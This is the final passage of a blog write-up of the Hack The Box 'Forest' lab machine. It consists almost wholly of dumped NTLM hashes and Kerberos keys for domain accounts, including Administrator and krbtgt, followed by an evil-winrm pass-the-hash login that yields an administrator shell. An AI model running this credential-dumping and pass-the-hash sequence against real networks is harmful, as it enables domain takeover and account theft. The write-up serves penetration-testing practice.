htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
puck:9601:aad3b435b51404eeaad3b435b51404ee:44f077e27f6fef69e7bd834c7242b040:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:80999de0dddffb9be58424af7aa12696:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
puck:aes256-cts-hmac-sha1-96:06e262b4631831eb9e36337f221a12ef9002d822111e2cf0b6986677b43de401
puck:aes128-cts-hmac-sha1-96:b36d7c9f29063935479a113ac05ce4f7
puck:des-cbc-md5:d97915c119025dd9
FOREST$:aes256-cts-hmac-sha1-96:667d61b318e1302ef1861f3dfe5f89ef1d737f7f277da9841f64dc6b49de811b
FOREST$:aes128-cts-hmac-sha1-96:2376f9c19c4bb9a61f7008ecb735af41
FOREST$:des-cbc-md5:15bffbfb9dcb2c51
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up... 
┌─[puck@parrot-lt]─[~/htb/forrest]

.

┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>

 

 

Author: Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *